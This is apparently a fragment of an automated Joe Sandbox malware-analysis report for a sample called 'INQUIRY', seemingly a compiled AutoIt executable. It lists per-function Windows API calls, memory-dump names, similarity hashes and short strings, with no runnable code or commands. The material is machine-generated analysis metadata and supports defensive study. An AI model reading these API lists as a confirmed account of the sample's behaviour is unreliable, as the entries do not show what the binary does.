• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 26db035487b335c52f703e16a2ff40839c271b6180ada9cae30ea482fe9bc8a8
• Instruction ID: 608d60a995641b6a51df89953345d54271d6b71da93b1ec724cd682584562a2a
• Opcode Fuzzy Hash: 26db035487b335c52f703e16a2ff40839c271b6180ada9cae30ea482fe9bc8a8
• Instruction Fuzzy Hash: 39210474904784AFE732CB688849BE6BBECAF45314F04009EE68E9A281C7742EC5CB41
APIs
  • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
  • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50
• gethostbyname.WSOCK32(?,?,?), ref: 00A86399
• WSAGetLastError.WSOCK32(00000000), ref: 00A863A4
• _memmove.LIBCMT ref: 00A863D1
• inet_ntoa.WSOCK32(?), ref: 00A863DC
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 2514d5d746aff9a976f4cca25cd9d281993a50427b7ba44e988baa8481daf205
• Instruction ID: 93f68a2ef2110335649166461a8793158c1a8a2395347589754d1cb7e0c086f1
• Opcode Fuzzy Hash: 2514d5d746aff9a976f4cca25cd9d281993a50427b7ba44e988baa8481daf205
• Instruction Fuzzy Hash: 18112B36A00109EFCF04FBA4DE96DEEB7B9AF48310B144065F506A7261DB30AE55DBA1
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A68B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68BA4
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 74ba6cfb9bbaf1efd52a874c1f615f27b706e037b6975ad12455425602987e7f
• Instruction ID: c439ce7a74d534709b871afa99f18328110973fb18eb7cca9cea2b0d6e89bef0
• Opcode Fuzzy Hash: 74ba6cfb9bbaf1efd52a874c1f615f27b706e037b6975ad12455425602987e7f
• Instruction Fuzzy Hash: 02114879900218FFEB10DFA5CC84FADBBB8FB48310F2041A5EA00B7290DA716E11DB94
APIs
  • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
• DefDlgProcW.USER32(?,00000020,?), ref: 00A112D8
• GetClientRect.USER32(?,?), ref: 00A4B5FB
• GetCursorPos.USER32(?), ref: 00A4B605
• ScreenToClient.USER32(?,?), ref: 00A4B610
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: f94f97d78c060c3d2224f5d5852b9dd109ea93d6e5e92a4338011b3c1929331d
• Instruction ID: 4bbd9bac9bf831f39e6f03e580ba88515304499c9845b3b00ed446991a58a0bc
• Opcode Fuzzy Hash: f94f97d78c060c3d2224f5d5852b9dd109ea93d6e5e92a4338011b3c1929331d
• Instruction Fuzzy Hash: DA113A35A01159EFCF10EFA8D989DEE77B8EB05301F500466FA01E7240CB34BA929BA5
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A7115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A71184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A7118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A711C1
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 1038104229a6ad3fac601e44fa1b9c5d7a56994d874369971f7f5ff6bf7cb67f
• Instruction ID: c920866b1c7babfecd57a3b7263f8077b97fa7a6d14bb054cf280b39c925db42
• Opcode Fuzzy Hash: 1038104229a6ad3fac601e44fa1b9c5d7a56994d874369971f7f5ff6bf7cb67f
• Instruction Fuzzy Hash: 92111C32D00519DBCF00DFE9DD48AEEBBB8FB09711F51825AEA49B6240CA7055918BD5
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A6D84D
                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A6D864
                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A6D879
                                                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A6D897
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                              • String ID:
                                                                                              • API String ID: 1352324309-0
                                                                                              • Opcode ID: 183cadddc79de5284920a06f08bd3dfd5828c7e62a5ad24ec6f0a4b8b82867aa
                                                                                              • Instruction ID: d30a22b29d2970882e87cd3a8a87ffd70de2596c4e4b50e2a2f9236c1799a209
                                                                                              • Opcode Fuzzy Hash: 183cadddc79de5284920a06f08bd3dfd5828c7e62a5ad24ec6f0a4b8b82867aa
                                                                                              • Instruction Fuzzy Hash: 49115EB5B05304DFE720CF90DC0CF92BBBCEB40B40F10856AAA16D7050DBB0E9599BA1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: 3c5ecf4ce3a055e302b107d5bf6cb937f64eef9e47c3b0c53305af91b033fa83
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: 0B014C7A44918ABBCF265F88DC01CEE3F62BB98350F598415FE5858031D736DAB1AB81
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A9B2E4
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9B2FC
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9B320
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A9B33B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: 4f202cbe2adff0d613b36e3d71b4738c8efdab20aa31378525c335a33b883062
                                                                                              • Instruction ID: e63307b5ddefd7eb8f0fa59509e566479a723fedbcd7356b6bb7fb9a97fb88fe
                                                                                              • Opcode Fuzzy Hash: 4f202cbe2adff0d613b36e3d71b4738c8efdab20aa31378525c335a33b883062
                                                                                              • Instruction Fuzzy Hash: 27114679D00249EFDB41CF99D5449EEBBF5FB08310F104166E914E3620D735AA558F50
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A9B644
                                                                                              • _memset.LIBCMT ref: 00A9B653
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AD6F20,00AD6F64), ref: 00A9B682
                                                                                              • CloseHandle.KERNEL32 ref: 00A9B694
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3277943733-0
                                                                                              • Opcode ID: de3ff4dcad962bef013c463b68f7dea9b8bcb0ba0a91393c78c31f74b01611d5
                                                                                              • Instruction ID: 712d15f652f8c6a388d9f2b358ad3be7a365a1943a7ef7814172e8af8eb8d0cc
                                                                                              • Opcode Fuzzy Hash: de3ff4dcad962bef013c463b68f7dea9b8bcb0ba0a91393c78c31f74b01611d5
                                                                                              • Instruction Fuzzy Hash: 5EF05EB26417047EF710A7A1BC46FBB3B9CEB0C395F004022FA0AE9192D7755C0187A8
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00A76BE6
                                                                                                • Part of subcall function 00A776C4: _memset.LIBCMT ref: 00A776F9
                                                                                              • _memmove.LIBCMT ref: 00A76C09
                                                                                              • _memset.LIBCMT ref: 00A76C16
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00A76C26
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 48991266-0
                                                                                              • Opcode ID: cca4c45dd4d97fee9145f4ba99adede288c84049f0489322180322817d4bc985
                                                                                              • Instruction ID: ab1ba635ee21fc53b29326993eae46d42e739f845c4b7252b898dfedab94fa32
                                                                                              • Opcode Fuzzy Hash: cca4c45dd4d97fee9145f4ba99adede288c84049f0489322180322817d4bc985
                                                                                              • Instruction Fuzzy Hash: E8F0543A200100AFCF016F95DC85E8ABB29EF45361F14C061FE089E227DB31E811CBB4
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 00A12231
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00A1223B
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00A12250
                                                                                              • GetStockObject.GDI32(00000005), ref: 00A12258
                                                                                              • GetWindowDC.USER32(?,00000000), ref: 00A4BE83
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A4BE90
                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00A4BEA9
                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00A4BEC2
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00A4BEE2
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00A4BEED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1946975507-0
                                                                                              • Opcode ID: d11ba6d5571c74d5b79ae894d5dbfb17103a8b537d01fba7453822f259cbf1df
                                                                                              • Instruction ID: 6a17b440e7b18fc85e37c74d986986cebb965480a085d6ef3858e570aff819bb
                                                                                              • Opcode Fuzzy Hash: d11ba6d5571c74d5b79ae894d5dbfb17103a8b537d01fba7453822f259cbf1df
                                                                                              • Instruction Fuzzy Hash: 74E03031204144AEDF219FA4EC4D7D83B10EB45332F208367FB69880E18B718991DB61
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 00A6871B
                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A682E6), ref: 00A68722
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A682E6), ref: 00A6872F
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A682E6), ref: 00A68736
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                              • String ID:
                                                                                              • API String ID: 3974789173-0
                                                                                              • Opcode ID: 11fe4cae7817cd1b17bdc9f15faadac4068bd0e78e047a332330915861be9278
                                                                                              • Instruction ID: 9d3eff2e45c91031c5c483d67b606d9eb7bf8d011dcd7445f2c5abee7e3b9329
                                                                                              • Opcode Fuzzy Hash: 11fe4cae7817cd1b17bdc9f15faadac4068bd0e78e047a332330915861be9278
                                                                                              • Instruction Fuzzy Hash: C3E086367112119FDB209FF05D0DB973BBCEF54B91F144829B645C9080EE788452C750
                                                                                              APIs
                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00A6B4BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContainedObject
                                                                                              • String ID: AutoIt3GUI$Container
                                                                                              • API String ID: 3565006973-3941886329
                                                                                              • Opcode ID: 19cf37a0006007be3f3d2697754f5e6c920003619b12bfcf3f9a81d549665ba3
                                                                                              • Instruction ID: 5a7fc71865a0fe77d2172568975fca75651344698a4694723728d321e4936971
                                                                                              • Opcode Fuzzy Hash: 19cf37a0006007be3f3d2697754f5e6c920003619b12bfcf3f9a81d549665ba3
                                                                                              • Instruction Fuzzy Hash: 02913970610601AFDB14DF68C884BAAB7F5FF49710F20856DF946CB6A1DB71E881CB60
                                                                                              APIs
                                                                                                • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • __wcsnicmp.LIBCMT ref: 00A7B02D
                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A7B0F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                              • String ID: LPT
                                                                                              • API String ID: 3222508074-1350329615
                                                                                              • Opcode ID: fbde71f4742b6ba5aa9d014431ec09a32d5d0f0544f3091011328834e07f7229
                                                                                              • Instruction ID: 25ae10a7b04d7d05029db256f85780602760ad989e426dad446839f590e54594
                                                                                              • Opcode Fuzzy Hash: fbde71f4742b6ba5aa9d014431ec09a32d5d0f0544f3091011328834e07f7229
                                                                                              • Instruction Fuzzy Hash: F76173B5A10215AFCB14DF54C961FEEB7B4EF08310F10C169F91AAB251D730AE41CB64
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00A22968
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A22981
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: 67a5ba400ad317c65eca411f51ae1300c9eebee5faca0f49f8262d19e78ee213
                                                                                              • Instruction ID: 102be2e899b41b6e990b1f75ab102fe310ef9e13a23f25673439e7a0c8314b7b
                                                                                              • Opcode Fuzzy Hash: 67a5ba400ad317c65eca411f51ae1300c9eebee5faca0f49f8262d19e78ee213
                                                                                              • Instruction Fuzzy Hash: DC514772408744ABD720EF50D986BEFBBE8FB85344F41885DF2D8410A2DB308569CB66
                                                                                              APIs
                                                                                                • Part of subcall function 00A14F0B: __fread_nolock.LIBCMT ref: 00A14F29
                                                                                              • _wcscmp.LIBCMT ref: 00A79824
                                                                                              • _wcscmp.LIBCMT ref: 00A79837
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                              • String ID: FILE
                                                                                              • API String ID: 4029003684-3121273764
                                                                                              • Opcode ID: f9f4952b643d01ce182532d8060ccda44e84141b5e34063fd763b278152d6708
                                                                                              • Instruction ID: ce4f1181b73423e760062854d692b4a4491d0393ab315ba299cbb74856e7fc82
                                                                                              • Opcode Fuzzy Hash: f9f4952b643d01ce182532d8060ccda44e84141b5e34063fd763b278152d6708
                                                                                              • Instruction Fuzzy Hash: 0441C875A40219BADF209FA4CC46FEFBBBDEF89710F00846AF904F7181DA7199458B61
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A8259E
                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A825D4
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_memset
                                                                                              • String ID: |
                                                                                              • API String ID: 1413715105-2343686810
                                                                                              • Opcode ID: 5a5f092ad7d139133c9b863f1407cd70cc13f3daff9c4dfb8e195ecb8a9da59b
                                                                                              • Instruction ID: 02f47e95c572e4c6fcd5e8fe444a641f720bef979560201136eb7017d0a2577e
                                                                                              • Opcode Fuzzy Hash: 5a5f092ad7d139133c9b863f1407cd70cc13f3daff9c4dfb8e195ecb8a9da59b
                                                                                              • Instruction Fuzzy Hash: BB31F771800119EBCF11EFA4CD85EEEBFB9FF08350F101069F915A6262EB355996DB60
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A97B61
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A97B76
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 8190e7f471579d164e79ec9bc55887d1d3f742e41da2bd0a9e99b6c7780facc8
                                                                                              • Instruction ID: 379ee2f74d3d2c12b039ac40aa1aad51ace98ab38cf97c9a0db176adde15ef71
                                                                                              • Opcode Fuzzy Hash: 8190e7f471579d164e79ec9bc55887d1d3f742e41da2bd0a9e99b6c7780facc8
                                                                                              • Instruction Fuzzy Hash: AC41E374A0520A9FDF14CF68C981BEEBBF5FB08340F10016AE905AB391E770A951CFA0
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00A96B17
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A96B53
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyMove
                                                                                              • String ID: static
                                                                                              • API String ID: 2139405536-2160076837
                                                                                              • Opcode ID: 7d1f7a0b21cd5477148949f5a61b8c82d9b2631e4db6938c23af9c75dada1cf1
                                                                                              • Instruction ID: 93edc9d6023befa340e88c584232c06a37c212b3e888d5301dc4f0cfc9bfa130
                                                                                              • Opcode Fuzzy Hash: 7d1f7a0b21cd5477148949f5a61b8c82d9b2631e4db6938c23af9c75dada1cf1
                                                                                              • Instruction Fuzzy Hash: E7313871210604AEDF109F68D891AFB77F9FF48760F10861AF9A9D7190DA31AC92DB60
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A72911
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A7294C
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: c719d528499600400eb02c7fd6d38a753ffc4a5c3e32b94410d35fe361e2a8a8
                                                                                              • Instruction ID: b1dffc2b1f465d30c01942583b3c56d0178367dbb6138093c13fb9f273c02154
                                                                                              • Opcode Fuzzy Hash: c719d528499600400eb02c7fd6d38a753ffc4a5c3e32b94410d35fe361e2a8a8
                                                                                              • Instruction Fuzzy Hash: DD31D631A003059FEF24CF98DD85BAEBBF8EF45350F1CC029EA89A61A1D7709944DB51
